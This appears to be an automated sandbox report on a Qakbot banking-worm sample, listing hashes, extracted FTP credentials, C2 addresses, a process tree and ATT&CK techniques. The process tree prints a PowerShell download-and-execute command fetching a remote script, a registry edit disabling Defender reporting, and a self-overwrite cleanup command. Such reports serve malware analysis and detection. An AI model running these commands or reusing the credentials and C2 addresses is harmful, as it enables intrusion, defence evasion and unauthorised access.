Analysis

  • max time kernel
    149s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    28-12-2020 18:58

General

  • Target

    aatnj.exe

  • Size

    39.5MB

  • MD5

    2cf766692a75309734b08b3bd8cc36df

  • SHA1

    a003224582db124237e8c879d795aefe8d23b22b

  • SHA256

    1ee6f8e9bbc53afa81c39326d5748c6c4322d2501c42adcb34f5b71bc34ae48b

  • SHA512

    a28bf5af4c30152bd89d23e5295e9a6faa23eac6f312d7841bfb4664fe725bf42fed2fe4bb65c164709d6aa98a5ff66cbb78ed86396be975d2aeb1386afcda2c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Campaign

1513068643

Credentials

  • Protocol:
    ftp
  • Host:
    66.96.133.9
  • Port:
    21
  • Username:
    help
  • Password:
    eT5TerAcnFe6~

  • Protocol:
    ftp
  • Host:
    174.123.38.58
  • Port:
    21
  • Username:
    log@thebrainregistry.com
  • Password:
    4BQ1MeeRAwNZEVu

  • Protocol:
    ftp
  • Host:
    61.221.12.26
  • Port:
    21
  • Username:
    logger@ostergift.com
  • Password:
    346HZGCMlwecz9S

  • Protocol:
    ftp
  • Host:
    67.222.137.18
  • Port:
    21
  • Username:
    logger@grupocrepusculo.net
  • Password:
    p4a8k6fE1FtA3pR

  • Protocol:
    ftp
  • Host:
    107.6.152.61
  • Port:
    21
  • Username:
    logger@trussedup.com
  • Password:
    RoP4Af0RKAAQ74V
C2

1.1.192.123:443

160.3.251.154:995

75.127.141.50:995

108.49.159.2:990

96.70.92.177:1194

70.184.255.4:443

73.171.50.80:443

98.201.98.191:443

104.159.220.171:443

100.8.244.14:443

66.76.136.65:443

24.45.150.163:443

216.201.159.118:443

66.76.136.65:1194

160.3.251.154:443

27.3.93.3:443

58.108.210.165:995

96.70.92.177:993

108.58.44.6:443

117.195.243.76:443

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 72 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1268
    • C:\Users\Admin\AppData\Local\Temp\aatnj.exe
      "C:\Users\Admin\AppData\Local\Temp\aatnj.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:292
      • C:\Users\Admin\AppData\Local\Temp\aatnj.exe
        "C:\Users\Admin\AppData\Local\Temp\aatnj.exe" /C
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1540
      • C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1376
        • C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe" /C
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:864
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          4⤵
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:656
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
          PID:272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\dsgqusyinllxtjzempwebswphyar.txt'"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:644
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\aatnj.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\SysWOW64\PING.EXE
            ping.exe -n 6 127.0.0.1
            4⤵
            • Runs ping.exe
            • Suspicious behavior: EnumeratesProcesses
            PID:2016
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1232
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1128
    • C:\Windows\system32\conhost.exe
      \??\C:\Windows\system32\conhost.exe "-19007207921145265970128245128521110818641071818068179498888-1386010726526966880"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1476
    • C:\Windows\system32\conhost.exe
      \??\C:\Windows\system32\conhost.exe "-1008628566724299117529814571568871720502565179-1509066441155205275116615787"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1940

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrq.dat
      MD5

      205dccc6f14473f9d0f627dd82b990e6

      SHA1

      b0da5441d278113fe1325b3abf23b31e9e695476

      SHA256

      9a1b7b5484d936382438484e1be23cfe4724f2de237d82c705cbe5215d722c42

      SHA512

      0d286fc012f951e1155ed985d8ea267a6bcf238c6f93bf0f928f4fba3d0d6a26c5f40472baba63a5fdecdf9acd6fb6b186f695bf2a6dc37f15bdc34e9c2b6196

    • C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
      MD5

      e8023ba3e33238f7d8afcf9edcb66dd5

      SHA1

      103806275b0bf9d81f5a160fff610977155f2bf5

      SHA256

      bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

      SHA512

      6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
      MD5

      e8023ba3e33238f7d8afcf9edcb66dd5

      SHA1

      103806275b0bf9d81f5a160fff610977155f2bf5

      SHA256

      bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

      SHA512

      6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
      MD5

      e8023ba3e33238f7d8afcf9edcb66dd5

      SHA1

      103806275b0bf9d81f5a160fff610977155f2bf5

      SHA256

      bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

      SHA512

      6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

    • \Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
      MD5

      e8023ba3e33238f7d8afcf9edcb66dd5

      SHA1

      103806275b0bf9d81f5a160fff610977155f2bf5

      SHA256

      bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

      SHA512

      6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

    • \Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe
      MD5

      e8023ba3e33238f7d8afcf9edcb66dd5

      SHA1

      103806275b0bf9d81f5a160fff610977155f2bf5

      SHA256

      bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac

      SHA512

      6180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1

    • memory/272-7-0x0000000000000000-mapping.dmp
    • memory/292-26-0x0000000000580000-0x0000000000581000-memory.dmp
      Filesize

      4KB

    • memory/644-16-0x0000000001F70000-0x0000000001F71000-memory.dmp
      Filesize

      4KB

    • memory/644-17-0x0000000001ED0000-0x0000000001ED1000-memory.dmp
      Filesize

      4KB

    • memory/644-9-0x0000000000000000-mapping.dmp
    • memory/644-12-0x000007FEF5DD0000-0x000007FEF67BC000-memory.dmp
      Filesize

      9.9MB

    • memory/644-14-0x0000000001D90000-0x0000000001D91000-memory.dmp
      Filesize

      4KB

    • memory/644-15-0x000000001AE10000-0x000000001AE11000-memory.dmp
      Filesize

      4KB

    • memory/644-44-0x00000000026C0000-0x00000000026C1000-memory.dmp
      Filesize

      4KB

    • memory/644-28-0x00000000021B0000-0x00000000021B1000-memory.dmp
      Filesize

      4KB

    • memory/644-24-0x000000001B8A0000-0x000000001B8A1000-memory.dmp
      Filesize

      4KB

    • memory/644-43-0x0000000002570000-0x0000000002571000-memory.dmp
      Filesize

      4KB

    • memory/644-31-0x0000000002600000-0x0000000002601000-memory.dmp
      Filesize

      4KB

    • memory/656-20-0x0000000000000000-mapping.dmp
    • memory/864-11-0x0000000000000000-mapping.dmp
    • memory/864-18-0x0000000002480000-0x0000000002491000-memory.dmp
      Filesize

      68KB

    • memory/1128-22-0x0000000001B70000-0x0000000001B71000-memory.dmp
      Filesize

      4KB

    • memory/1376-6-0x0000000000000000-mapping.dmp
    • memory/1376-19-0x0000000000E90000-0x0000000000EF8000-memory.dmp
      Filesize

      416KB

    • memory/1540-3-0x0000000002480000-0x0000000002491000-memory.dmp
      Filesize

      68KB

    • memory/1540-2-0x0000000000000000-mapping.dmp
    • memory/2004-45-0x0000000000000000-mapping.dmp
    • memory/2004-48-0x0000000000000000-mapping.dmp
    • memory/2016-46-0x0000000000000000-mapping.dmp
    • memory/2016-51-0x0000000000000000-mapping.dmp